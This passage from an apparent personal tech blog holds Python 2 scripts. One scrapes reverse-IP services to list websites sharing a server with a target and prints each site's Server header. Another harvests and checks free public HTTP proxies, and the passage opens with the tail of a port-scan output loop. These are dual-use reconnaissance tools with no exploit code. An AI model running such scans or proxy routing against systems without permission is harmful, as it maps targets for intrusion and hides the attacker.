                        # http behind an ssl tunnel is really https
                        if result['name'] == 'http' and result['tunnel'] == 'ssl':
                            result['name'] = 'https'
                        # domain is set by the enclosing scan loop
                        print(domain + '\t' + targetHost + '\t' + str(targetport) + '\t' + result['name'] + '\t' + result['product'] + result['version'])
                        #if result['name'] in ["https","http"]:

Scan results with the patched file (screenshot omitted).

python same-IP site lookup

Published: July 30, 2016 // Categories: dev notes, work log, code study, linux, python, windows // No Comments

The lookup pulls from four sources, as the code below shows: i.links.cn, ip2hosts.com, dns.aizhan.com and s.tool.chinaz.com.

Sample output (screenshot omitted):

#!/usr/bin/env python
#encoding: utf-8
import re
import sys
import json
import time
import requests
import urllib
import requests.packages.urllib3
from multiprocessing import Pool
from BeautifulSoup import BeautifulSoup
requests.packages.urllib3.disable_warnings()

headers = {'User-Agent' : 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/535.20 (KHTML, like Gecko) Chrome/19.0.1036.7 Safari/535.20'}

def links_ip(host):   
    '''
    Find sites sharing the same IP via i.links.cn
    '''
    ip2hosts = []
    ip2hosts.append("http://"+host)
    try:
        source = requests.get('http://i.links.cn/sameip/' + host + '.html', headers=headers,verify=False)
        soup = BeautifulSoup(source.text)
        divs = soup.findAll(style="word-break:break-all")
        
        if divs == []:  # nothing scraped
            print 'Sorry! Not found!'
            return ip2hosts 
        for div in divs:
            #print div.a.string
            ip2hosts.append(div.a.string)
    except Exception, e:
        print str(e)
        return ip2hosts
    return ip2hosts

def ip2host_get(host):
    ip2hosts = []
    ip2hosts.append("http://"+host)
    try:
        req=requests.get('http://www.ip2hosts.com/search.php?ip='+str(host), headers=headers,verify=False)
        src=req.content
        if src.find('result') != -1:
            result = json.loads(src)['result']
            ip = json.loads(src)['ip']
            if len(result)>0:
                for item in result:
                    if len(item)>0:
                        #log(scan_type,host,port,str(item))
                        ip2hosts.append(item)
    except Exception, e:
        print str(e)
        return ip2hosts
    return ip2hosts


def filter(host):
    '''
    Skip sites that fail to open; print host and Server header for the rest
    '''
    try:
        response = requests.get(host, headers=headers ,verify=False)
        server = response.headers['Server']
        title = re.findall(r'<title>(.*?)</title>',response.content)[0]
    except Exception,e:
        #print "%s" % str(e)
        #print host
        pass
    else:
        print host,server

def aizhan(host):
    ip2hosts = []
    ip2hosts.append("http://"+host)
    regexp = r'''<a href="[^']+?([^']+?)/" rel="nofollow" target="_blank">\1</a>'''
    regexp_next = r'''<a href="http://dns.aizhan.com/[^/]+?/%d/">%d</a>'''
    url = 'http://dns.aizhan.com/%s/%d/'

    page = 1
    while True:
        if page > 2:
            time.sleep(1)   # throttle to avoid being blocked
        req = requests.get(url % (host, page), headers=headers, verify=False)
        if req.status_code == 400:
            break
        try:
            html = req.content.decode('utf-8')  # fetch the page
        except Exception as e:
            print str(e)
            break   # html would be undefined below, so stop here
        for site in re.findall(regexp, html):
            ip2hosts.append("http://" + site)
        if re.search(regexp_next % (page+1, page+1), html) is None:
            return ip2hosts
        page += 1

    return ip2hosts

def chinaz(host):
    ip2hosts = []
    ip2hosts.append("http://"+host)
    regexp = r'''<a href='[^']+?([^']+?)' target=_blank>\1</a>'''
    regexp_next = r'''<a href="javascript:" val="%d" class="item[^"]*?">%d</a>'''
    url = 'http://s.tool.chinaz.com/same?s=%s&page=%d'

    page = 1
    while True:
        if page > 1:
            time.sleep(1)   # throttle to avoid being blocked
        req = requests.get(url % (host, page), headers=headers, verify=False)
        html = req.content.decode('utf-8')  # fetch the page
        for site in re.findall(regexp, html):
            ip2hosts.append("http://" + site)
        if re.search(regexp_next % (page+1, page+1), html) is None:
            return ip2hosts
        page += 1
    return ip2hosts

def same_ip(host):
    mydomains = []
    mydomains.extend(ip2host_get(host))
    mydomains.extend(links_ip(host))
    mydomains.extend(aizhan(host))
    mydomains.extend(chinaz(host))
    mydomains = list(set(mydomains))
    p = Pool()
    for host in mydomains:
        p.apply_async(filter, args=(host,))
    p.close()
    p.join()


if __name__=="__main__":
    if len(sys.argv) == 2:
        same_ip(sys.argv[1])
    else:
        print ("usage: %s host" % sys.argv[0])
        sys.exit(-1)
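
Usage is a single argument; assuming the script is saved as same_ip.py (the filename is my choice):

python same_ip.py testphp.vulnweb.com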


Grabbing HTTP proxies with python

Published: July 24, 2016 // Categories: dev notes, work log, ops, linux, python, windows // 7 Comments

The script pulls proxy lists from http://www.ip181.com/, http://www.kuaidaili.com/ and http://www.66ip.com/, then checks each proxy's reliability by fetching v2ex.com and guokr.com through it.

# -*- coding=utf8 -*-
"""
    从网上爬取HTTPS代理
"""
import re
import sys
import time
import Queue
import logging
import requests
import threading
from pyquery import PyQuery
import requests.packages.urllib3
requests.packages.urllib3.disable_warnings()


#logging.basicConfig(
#    level=logging.DEBUG,
#    format="[%(asctime)s] %(levelname)s: %(message)s")

class Worker(threading.Thread):  # worker thread: executes queued jobs
    def __init__(self, workQueue, resultQueue, **kwds):
        threading.Thread.__init__(self, **kwds)
        self.setDaemon(True)
        self.workQueue = workQueue
        self.resultQueue = resultQueue

    def run(self):
        while 1:
            try:
                callable, args, kwds = self.workQueue.get(False)  # get task
                res = callable(*args, **kwds)
                self.resultQueue.put(res)  # put result
            except Queue.Empty:
                break


class WorkManager:  # creates and manages the thread pool
    def __init__(self, num_of_workers=10):
        self.workQueue = Queue.Queue()  # job queue
        self.resultQueue = Queue.Queue()  # result queue
        self.workers = []
        self._recruitThreads(num_of_workers)

    def _recruitThreads(self, num_of_workers):
        for i in range(num_of_workers):
            worker = Worker(self.workQueue, self.resultQueue)  # spawn a worker thread
            self.workers.append(worker)  # add it to the pool

    def start(self):
        for w in self.workers:
            w.start()

    def wait_for_complete(self):
        while len(self.workers):
            worker = self.workers.pop()  # take a thread out of the pool
            worker.join()
            if worker.isAlive() and not self.workQueue.empty():
                self.workers.append(worker)  # still busy: put it back in the pool
        #logging.info('All jobs were complete.')

    def add_job(self, callable, *args, **kwds):
        self.workQueue.put((callable, args, kwds))  # enqueue a job

    def get_result(self, *args, **kwds):
        return self.resultQueue.get(*args, **kwds)

def check_proxies(ip,port):
    """
    Check that a proxy actually works by fetching
    v2ex.com and guokr.com through it
    """
    proxies={'http': 'http://'+str(ip)+':'+str(port)}
    try:
        r0 = requests.get('http://v2ex.com', proxies=proxies,timeout=30,verify=False)
        r1 = requests.get('http://www.guokr.com', proxies=proxies,timeout=30,verify=False)

        if r0.status_code == requests.codes.ok and r1.status_code == requests.codes.ok and "09043258" in r1.content and "15015613" in r0.content:
            #r0.status_code == requests.codes.ok and r1.status_code == requests.codes.ok and 
            print ip,port
            return True
        else:
            return False

    except Exception, e:
        pass
        #sys.stderr.write(str(e))
        #sys.stderr.write(str(ip)+"\t"+str(port)+"\terror\r\n")
        return False

def get_ip181_proxies():
    """
    http://www.ip181.com/获取HTTP代理
    """
    proxy_list = []
    try:
        html_page = requests.get('http://www.ip181.com/',timeout=60,verify=False,allow_redirects=False).content.decode('gb2312')
        jq = PyQuery(html_page)
        for tr in jq("tr"):
            element = [PyQuery(td).text() for td in PyQuery(tr)("td")]
            if 'HTTP' not in element[3]:
                continue

            result = re.search(r'\d+\.\d+', element[4], re.UNICODE)
            if result and float(result.group()) > 5:
                continue
            #print element[0],element[1]
            proxy_list.append((element[0], element[1]))
    except Exception, e:
        sys.stderr.write(str(e))
        pass

    return proxy_list

def get_kuaidaili_proxies():
    """
    http://www.kuaidaili.com/获取HTTP代理
    """
    proxy_list = []
    for m in ['inha', 'intr', 'outha', 'outtr']:
        try:
            html_page = requests.get('http://www.kuaidaili.com/free/'+m,timeout=60,verify=False,allow_redirects=False).content.decode('utf-8')
            patterns = re.findall(r'(?P<ip>(?:\d{1,3}\.){3}\d{1,3})</td>\n?\s*<td.*?>\s*(?P<port>\d{1,4})',html_page)
            for element in patterns:
                #print element[0],element[1]
                proxy_list.append((element[0], element[1]))
        except Exception, e:
            sys.stderr.write(str(e))
            pass

    for n in range(0,11):
        try:
            html_page = requests.get('http://www.kuaidaili.com/proxylist/'+str(n)+'/',timeout=60,verify=False,allow_redirects=False).content.decode('utf-8')
            patterns = re.findall(r'(?P<ip>(?:\d{1,3}\.){3}\d{1,3})</td>\n?\s*<td.*?>\s*(?P<port>\d{1,4})',html_page)
            for element in patterns:
                #print element[0],element[1]
                proxy_list.append((element[0], element[1]))
        except Exception, e:
            sys.stderr.write(str(e))
            pass

    return proxy_list

def get_66ip_proxies():
    """
    http://www.66ip.com/ api接口获取HTTP代理
    """
    urllists = [
        'http://www.proxylists.net/http_highanon.txt',
        'http://www.proxylists.net/http.txt',
        'http://www.66ip.cn/nmtq.php?getnum=1000&anonymoustype=%s&proxytype=2&api=66ip',
        'http://www.66ip.cn/mo.php?sxb=&tqsl=100&port=&export=&ktip=&sxa=&submit=%CC%E1++%C8%A1'
        ]
    proxy_list = []
    for url in urllists:
        try:
            html_page = requests.get(url,timeout=60,verify=False,allow_redirects=False).content.decode('gb2312')
            patterns = re.findall(r'((?:\d{1,3}\.){1,3}\d{1,3}):([1-9]\d*)',html_page)
            for element in patterns:
                #print element[0],element[1]
                proxy_list.append((element[0], element[1]))
        except Exception, e:
            sys.stderr.write(str(e))
            pass

    return proxy_list


def get_proxy_sites():
    wm = WorkManager(20)
    proxysites = []
    proxysites.extend(get_ip181_proxies())
    proxysites.extend(get_kuaidaili_proxies())
    proxysites.extend(get_66ip_proxies())

    for element in proxysites:
        wm.add_job(check_proxies,str(element[0]),str(element[1]))
    wm.start()
    wm.wait_for_complete()


if __name__ == '__main__':
    try:
        get_proxy_sites()
    except Exception as exc:
        print(exc)
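
One detail worth noting: the True/False results of check_proxies accumulate in resultQueue but are never read. A small sketch, reusing the classes and functions above, of how the survivors could be counted after a run:

def count_alive_proxies():
    wm = WorkManager(20)
    proxies = get_ip181_proxies()
    for ip, port in proxies:
        wm.add_job(check_proxies, str(ip), str(port))
    wm.start()
    wm.wait_for_complete()
    # drain the result queue once every worker has finished
    alive = 0
    while not wm.resultQueue.empty():
        if wm.get_result():
            alive += 1
    print '%d of %d proxies alive' % (alive, len(proxies))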
